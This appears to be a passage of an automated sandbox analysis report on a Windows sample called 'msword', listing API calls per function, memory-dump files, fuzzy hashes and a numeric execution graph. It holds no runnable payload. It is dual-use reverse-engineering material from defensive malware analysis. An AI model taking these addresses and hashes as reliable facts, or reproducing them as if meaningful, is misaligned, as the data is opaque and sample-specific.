                                          • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                          • GetTickCount.KERNEL32 ref: 00403303
                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                          • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                          • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                          • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                          • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                          • String ID:
                                          • API String ID: 2883127279-0
                                          • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                          • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                          • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                          • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 0040492E
                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                          • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                          • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                          • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                          APIs
                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringlstrcmp
                                          • String ID: !N~
                                          • API String ID: 623250636-529124213
                                          • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                          • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                          • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                          • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                          APIs
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                          • CloseHandle.KERNEL32(?), ref: 00405C9D
                                          Strings
                                          • Error launching installer, xrefs: 00405C74
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                          • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                          • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                          • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                          APIs
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                            • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: CloseHandlelstrlenwvsprintf
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3509786178-2769509956
                                          • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                          • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                          • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                          • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                          • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                          • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                          • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                          • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                          • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                          Execution Graph

                                          Execution Coverage:2.9%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:3.6%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:65
                                          execution_graph 103294 b436f5 103297 b4370f 103294->103297 103298 b43726 103297->103298 103299 b4378a 103298->103299 103300 b4372b 103298->103300 103336 b43788 103298->103336 103304 b43790 103299->103304 103305 b83df4 103299->103305 103301 b43804 PostQuitMessage 103300->103301 103302 b43738 103300->103302 103338 b43709 103301->103338 103306 b43743 103302->103306 103307 b83e61 103302->103307 103303 b4376f DefWindowProcW 103303->103338 103309 b43797 103304->103309 103310 b437bc SetTimer RegisterWindowMessageW 103304->103310 103350 b42f92 10 API calls 103305->103350 103311 b4374d 103306->103311 103312 b4380e 103306->103312 103363 bac8f7 66 API calls ___scrt_fastfail 103307->103363 103316 b437a0 KillTimer 103309->103316 103317 b83d95 103309->103317 103313 b437e5 CreatePopupMenu 103310->103313 103310->103338 103319 b43758 103311->103319 103320 b83e46 103311->103320 103348 b5fcad 59 API calls ___scrt_fastfail 103312->103348 103313->103338 103315 b83e15 103351 b5f23c 41 API calls 103315->103351 103342 b43907 103316->103342 103324 b83d9a 103317->103324 103325 b83dd0 MoveWindow 103317->103325 103327 b437f2 103319->103327 103334 b43763 103319->103334 103320->103303 103362 ba1423 22 API calls 103320->103362 103321 b83e73 103321->103303 103321->103338 103328 b83dbf SetFocus 103324->103328 103329 b83da0 103324->103329 103325->103338 103347 b4381f 76 API calls ___scrt_fastfail 103327->103347 103328->103338 103330 b83da9 103329->103330 103329->103334 103349 b42f92 10 API calls 103330->103349 103334->103303 103339 b43907 Shell_NotifyIconW 103334->103339 103336->103303 103337 b43802 103337->103338 103340 b83e3a 103339->103340 103352 b4396b 103340->103352 103343 b437b3 103342->103343 103344 b43919 ___scrt_fastfail 103342->103344 103346 b459ff DeleteObject DestroyWindow 103343->103346 103345 b43938 Shell_NotifyIconW 103344->103345 103345->103343 103346->103338 103347->103337 103348->103337 103349->103338 103350->103315 103351->103334 103353 b43996 ___scrt_fastfail 103352->103353 103364 b45f32 103353->103364 103357 b840cd Shell_NotifyIconW 103358 b43a3a Shell_NotifyIconW 103368 b461a9 103358->103368 103359 b43a1c 103359->103357 103359->103358 103361 b43a50 103361->103336 103362->103336 103363->103321 103365 b439eb 103364->103365 103366 b45f4e 103364->103366 103365->103359 103398 bad11f 42 API calls _strftime 103365->103398 103366->103365 103367 b85070 DestroyIcon 103366->103367 103367->103365 103369 b461c6 103368->103369 103370 b462a8 103368->103370 103399 b47ad5 103369->103399 103370->103361 103373 b85278 LoadStringW 103377 b85292 103373->103377 103374 b461e1 103404 b48577 103374->103404 103376 b461f6 103378 b46203 103376->103378 103386 b852ae 103376->103386 103383 b46229 ___scrt_fastfail 103377->103383 103426 b4bed9 103377->103426 103378->103377 103379 b4620d 103378->103379 103416 b46b7c 103379->103416 103387 b4628e Shell_NotifyIconW 103383->103387 103385 b852f1 103437 b5fe6f 51 API calls 103385->103437 103386->103383 103386->103385 103430 b4bf73 103386->103430 103387->103370 103392 b85310 103394 b46b7c 22 API calls 103392->103394 103393 b852e3 103436 b47bb5 22 API calls 103393->103436 103396 b85321 103394->103396 103397 b46b7c 22 API calls 103396->103397 103397->103383 103398->103359 103438 b6017b 103399->103438 103401 b47afa 103448 b6014b 103401->103448 103403 b461d4 103403->103373 103403->103374 103405 b48587 _wcslen 103404->103405 103406 b86610 103404->103406 103409 b485c2 103405->103409 103410 b4859d 103405->103410 103474 b4adf4 103406->103474 103408 b86619 103408->103408 103412 b6014b 22 API calls 103409->103412 103473 b488e8 22 API calls 103410->103473 103414 b485ce 103412->103414 103413 b485a5 __fread_nolock 103413->103376 103415 b6017b 22 API calls 103414->103415 103415->103413 103417 b857fe 103416->103417 103418 b46b93 103416->103418 103420 b6014b 22 API calls 103417->103420 103484 b46ba4 103418->103484 103422 b85808 _wcslen 103420->103422 103421 b4621b 103425 b47bb5 22 API calls 103421->103425 103423 b6017b 22 API calls 103422->103423 103424 b85841 __fread_nolock 103423->103424 103425->103383 103427 b4beed 103426->103427 103429 b4befc __fread_nolock 103426->103429 103428 b6017b 22 API calls 103427->103428 103427->103429 103428->103429 103429->103383 103431 b6017b 22 API calls 103430->103431 103432 b4bf88 103431->103432 103433 b6014b 22 API calls 103432->103433 103434 b4bf96 103433->103434 103435 baa350 23 API calls 103434->103435 103435->103393 103436->103385 103437->103392 103440 b6014b 103438->103440 103441 b6016a 103440->103441 103444 b6016c 103440->103444 103458 b6ed7c 103440->103458 103465 b6521d 7 API calls 2 library calls 103440->103465 103441->103401 103443 b609dd 103467 b63614 RaiseException 103443->103467 103444->103443 103466 b63614 RaiseException 103444->103466 103446 b609fa 103446->103401 103450 b60150 103448->103450 103449 b6ed7c ___std_exception_copy 21 API calls 103449->103450 103450->103449 103451 b6016a 103450->103451 103453 b6016c 103450->103453 103470 b6521d 7 API calls 2 library calls 103450->103470 103451->103403 103454 b609dd 103453->103454 103471 b63614 RaiseException 103453->103471 103472 b63614 RaiseException 103454->103472 103456 b609fa 103456->103403 103463 b73b93 __dosmaperr 103458->103463 103459 b73bd1 103469 b6f649 20 API calls __dosmaperr 103459->103469 103461 b73bbc RtlAllocateHeap 103462 b73bcf 103461->103462 103461->103463 103462->103440 103463->103459 103463->103461 103468 b6521d 7 API calls 2 library calls 103463->103468 103465->103440 103466->103443 103467->103446 103468->103463 103469->103462 103470->103450 103471->103454 103472->103456 103473->103413 103475 b4ae02 103474->103475 103476 b4ae0b __fread_nolock 103474->103476 103475->103476 103478 b4c2c9 103475->103478 103476->103408 103476->103476 103479 b4c2dc 103478->103479 103483 b4c2d9 __fread_nolock 103478->103483 103480 b6014b 22 API calls 103479->103480 103481 b4c2e7 103480->103481 103482 b6017b 22 API calls 103481->103482 103482->103483 103483->103476 103485 b46bb4 _wcslen 103484->103485 103486 b46bc7 103485->103486 103487 b85860 103485->103487 103494 b47d74 103486->103494 103489 b6014b 22 API calls 103487->103489 103491 b8586a 103489->103491 103490 b46bd4 __fread_nolock 103490->103421 103492 b6017b 22 API calls 103491->103492 103493 b8589a __fread_nolock 103492->103493 103495 b47d8a 103494->103495 103498 b47d85 __fread_nolock 103494->103498 103496 b86528 103495->103496 103497 b6017b 22 API calls 103495->103497 103497->103498 103498->103490 103499 b41033 103504 b468b4 103499->103504 103503 b41042 103505 b4bf73 22 API calls 103504->103505 103506 b46922 103505->103506 103512 b4589f 103506->103512 103508 b469bf 103510 b41038 103508->103510 103515 b46b14 22 API calls __fread_nolock 103508->103515 103511 b60413 29 API calls __onexit 103510->103511 103511->103503 103516 b458cb 103512->103516 103515->103508 103517 b458be 103516->103517 103518 b458d8 103516->103518 103517->103508 103518->103517 103519 b458df RegOpenKeyExW 103518->103519 103519->103517 103520 b458f9 RegQueryValueExW 103519->103520 103521 b4592f RegCloseKey 103520->103521 103522 b4591a 103520->103522 103521->103517 103522->103521 103523 b4f4dc 103526 b4cab0 103523->103526 103527 b4cacb 103526->103527 103528 b9150c 103527->103528 103529 b914be 103527->103529 103537 b4caf0 103527->103537 103598 bc62ff 191 API calls 2 library calls 103528->103598 103532 b914c8 103529->103532 103535 b914d5 103529->103535 103529->103537 103596 bc6790 191 API calls 103532->103596 103553 b4cdc0 103535->103553 103597 bc6c2d 191 API calls 2 library calls 103535->103597 103543 b916e8 103537->103543 103547 b4cdee 103537->103547 103551 b5e807 40 API calls 103537->103551 103552 b4cf80 40 API calls 103537->103552 103537->103553 103555 b4bed9 22 API calls 103537->103555 103557 b50340 103537->103557 103580 b4be2d 103537->103580 103584 b5e7c1 40 API calls 103537->103584 103585 b5aa99 191 API calls 103537->103585 103586 b605b2 5 API calls __Init_thread_wait 103537->103586 103587 b5bc58 103537->103587 103592 b60413 29 API calls __onexit 103537->103592 103593 b60568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103537->103593 103594 b5f4df 82 API calls 103537->103594 103595 b5f346 191 API calls 103537->103595 103599 b4b4c8 22 API calls 103537->103599 103600 b9ffaf 22 API calls 103537->103600 103539 b9179f 103539->103539 103601 bc6669 82 API calls 103543->103601 103551->103537 103552->103537 103553->103547 103602 bb3fe1 82 API calls __wsopen_s 103553->103602 103555->103537 103559 b50376 ISource 103557->103559 103558 b60413 29 API calls pre_c_initialization 103558->103559 103559->103558 103560 b9632b 103559->103560 103562 b6014b 22 API calls 103559->103562 103563 b51695 103559->103563 103565 b9625a 103559->103565 103566 b95cdb 103559->103566 103570 b4bed9 22 API calls 103559->103570 103573 b605b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103559->103573 103574 b4bf73 22 API calls 103559->103574 103575 b5049d ISource 103559->103575 103576 b50aae ISource 103559->103576 103577 b60568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103559->103577 103578 b96115 103559->103578 103603 b51990 191 API calls 2 library calls 103559->103603 103604 b51e50 41 API calls ISource 103559->103604 103608 bb3fe1 82 API calls __wsopen_s 103560->103608 103562->103559 103567 b4bed9 22 API calls 103563->103567 103563->103575 103607 bb3fe1 82 API calls __wsopen_s 103565->103607 103572 b4bed9 22 API calls 103566->103572 103566->103575 103567->103575 103570->103559 103572->103575 103573->103559 103574->103559 103575->103537 103606 bb3fe1 82 API calls __wsopen_s 103576->103606 103577->103559 103605 bb3fe1 82 API calls __wsopen_s 103578->103605 103582 b4be38 103580->103582 103581 b4be67 103581->103537 103582->103581 103609 b4bfa5 40 API calls 103582->103609 103584->103537 103585->103537 103586->103537 103588 b6014b 22 API calls 103587->103588 103589 b5bc65 103588->103589 103610 b4b329 103589->103610 103592->103537 103593->103537 103594->103537 103595->103537 103596->103535 103597->103553 103598->103537 103599->103537 103600->103537 103601->103553 103602->103539 103603->103559 103604->103559 103605->103576 103606->103575 103607->103575 103608->103575 103609->103581 103611 b4b338 _wcslen 103610->103611 103612 b6017b 22 API calls 103611->103612 103613 b4b360 __fread_nolock 103612->103613 103614 b6014b 22 API calls 103613->103614 103615 b4b376 103614->103615 103615->103537 103616 b95650 103625 b5e3d5 103616->103625 103618 b95666 103620 b956e1 103618->103620 103634 b5aa65 23 API calls 103618->103634 103623 b961d7 103620->103623 103636 bb3fe1 82 API calls __wsopen_s 103620->103636 103622 b956c1 103622->103620 103635 bb247e 22 API calls 103622->103635 103626 b5e3f6 103625->103626 103627 b5e3e3 103625->103627 103629 b5e429 103626->103629 103630 b5e3fb 103626->103630 103637 b4b4c8 22 API calls 103627->103637 103638 b4b4c8 22 API calls 103629->103638 103631 b6014b 22 API calls 103630->103631 103633 b5e3ed 103631->103633 103633->103618 103634->103622 103635->103620 103636->103623 103637->103633 103638->103633 103639 b4dd3d 103640 b4dd63 103639->103640 103641 b919c2 103639->103641 103642 b4dead 103640->103642 103645 b6014b 22 API calls 103640->103645 103644 b91a82 103641->103644 103649 b91a26 103641->103649 103652 b91a46 103641->103652 103646 b6017b 22 API calls 103642->103646 103699 bb3fe1 82 API calls __wsopen_s 103644->103699 103651 b4dd8d 103645->103651 103658 b4dee4 __fread_nolock 103646->103658 103647 b91a7d 103697 b5e6e8 191 API calls 103649->103697 103653 b6014b 22 API calls 103651->103653 103651->103658 103652->103647 103698 bb3fe1 82 API calls __wsopen_s 103652->103698 103654 b4dddb 103653->103654 103654->103649 103656 b4de16 103654->103656 103655 b6017b 22 API calls 103655->103658 103657 b50340 191 API calls 103656->103657 103659 b4de29 103657->103659 103658->103652 103658->103655 103659->103647 103659->103658 103660 b91aa5 103659->103660 103661 b4de77 103659->103661 103663 b4d526 103659->103663 103700 bb3fe1 82 API calls __wsopen_s 103660->103700 103661->103642 103661->103663 103664 b6014b 22 API calls 103663->103664 103665 b4d589 103664->103665 103681 b4c32d 103665->103681 103668 b6014b 22 API calls 103675 b4d66e ISource 103668->103675 103669 b4c3ab 22 API calls 103680 b4d9ac ISource 103669->103680 103670 b4bed9 22 API calls 103670->103675 103673 b4dd30 103674 b91f79 103702 ba56ae 22 API calls ISource 103674->103702 103675->103670 103675->103674 103676 b91f94 103675->103676 103679 b4d911 ISource 103675->103679 103688 b4c3ab 103675->103688 103701 b4b4c8 22 API calls 103675->103701 103679->103669 103679->103680 103680->103673 103696 b5e30a 22 API calls ISource 103680->103696 103684 b4c33d 103681->103684 103682 b4c345 103682->103668 103683 b6014b 22 API calls 103683->103684 103684->103682 103684->103683 103685 b4bf73 22 API calls 103684->103685 103686 b4c32d 22 API calls 103684->103686 103687 b4bed9 22 API calls 103684->103687 103685->103684 103686->103684 103687->103684 103689 b4c3b9 103688->103689 103695 b4c3e1 ISource 103688->103695 103690 b4c3c7 103689->103690 103691 b4c3ab 22 API calls 103689->103691 103692 b4c3cd 103690->103692 103693 b4c3ab 22 API calls 103690->103693 103691->103690 103692->103695 103703 b4c7e0 103692->103703 103693->103692 103695->103675 103696->103680 103697->103652 103698->103647 103699->103647 103700->103647 103701->103675 103702->103676 103704 b4c7eb ISource 103703->103704 103706 b4c826 ISource 103704->103706 103707 b5e322 22 API calls ISource 103704->103707 103706->103695 103707->103706 103708 b50ebf 103709 b50ed3 103708->103709 103715 b51425 103708->103715 103710 b50ee5 103709->103710 103711 b6014b 22 API calls 103709->103711 103712 b9562c 103710->103712 103714 b50f3e 103710->103714 103797 b4b4c8 22 API calls 103710->103797 103711->103710 103798 bb1b14 22 API calls 103712->103798 103720 b5049d ISource 103714->103720 103741 b52b20 103714->103741 103715->103710 103718 b4bed9 22 API calls 103715->103718 103718->103710 103719 b9632b 103802 bb3fe1 82 API calls __wsopen_s 103719->103802 103722 b51695 103722->103720 103727 b4bed9 22 API calls 103722->103727 103723 b6014b 22 API calls 103740 b50376 ISource 103723->103740 103725 b9625a 103801 bb3fe1 82 API calls __wsopen_s 103725->103801 103726 b4bed9 22 API calls 103726->103740 103727->103720 103730 b95cdb 103730->103720 103733 b4bed9 22 API calls 103730->103733 103731 b605b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103731->103740 103733->103720 103734 b4bf73 22 API calls 103734->103740 103735 b60413 29 API calls pre_c_initialization 103735->103740 103736 b50aae ISource 103800 bb3fe1 82 API calls __wsopen_s 103736->103800 103737 b60568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103737->103740 103738 b96115 103799 bb3fe1 82 API calls __wsopen_s 103738->103799 103740->103719 103740->103720 103740->103722 103740->103723 103740->103725 103740->103726 103740->103730 103740->103731 103740->103734 103740->103735 103740->103736 103740->103737 103740->103738 103795 b51990 191 API calls 2 library calls 103740->103795 103796 b51e50 41 API calls ISource 103740->103796 103742 b52b61 103741->103742 103743 b52b86 103742->103743 103744 b52fc0 103742->103744 103745 b97bd8 103743->103745 103746 b52ba0 103743->103746 103886 b605b2 5 API calls __Init_thread_wait 103744->103886 103849 bc7af9 103745->103849 103803 b53160 103746->103803 103750 b52fca 103754 b4b329 22 API calls 103750->103754 103759 b5300b 103750->103759 103751 b97be4 103751->103740 103753 b53160 9 API calls 103755 b52bc6 103753->103755 103762 b52fe4 103754->103762 103756 b52bfc 103755->103756 103755->103759 103758 b97bfd 103756->103758 103773 b52c18 __fread_nolock 103756->103773 103757 b97bed 103757->103740 103891 bb3fe1 82 API calls __wsopen_s 103758->103891 103759->103757 103888 b4b4c8 22 API calls 103759->103888 103887 b60568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103762->103887 103763 b53049 103889 b5e6e8 191 API calls 103763->103889 103766 b97c15 103892 bb3fe1 82 API calls __wsopen_s 103766->103892 103767 b53082 103890 b5fe39 22 API calls 103767->103890 103769 b97c78 103894 bc61a2 54 API calls _wcslen 103769->103894 103770 b52d4c 103771 b53160 9 API calls 103770->103771 103774 b52d59 103771->103774 103773->103763 103773->103766 103775 b6014b 22 API calls 103773->103775 103776 b6017b 22 API calls 103773->103776 103781 b50340 191 API calls 103773->103781 103783 b52d3f 103773->103783 103784 b97c59 103773->103784 103790 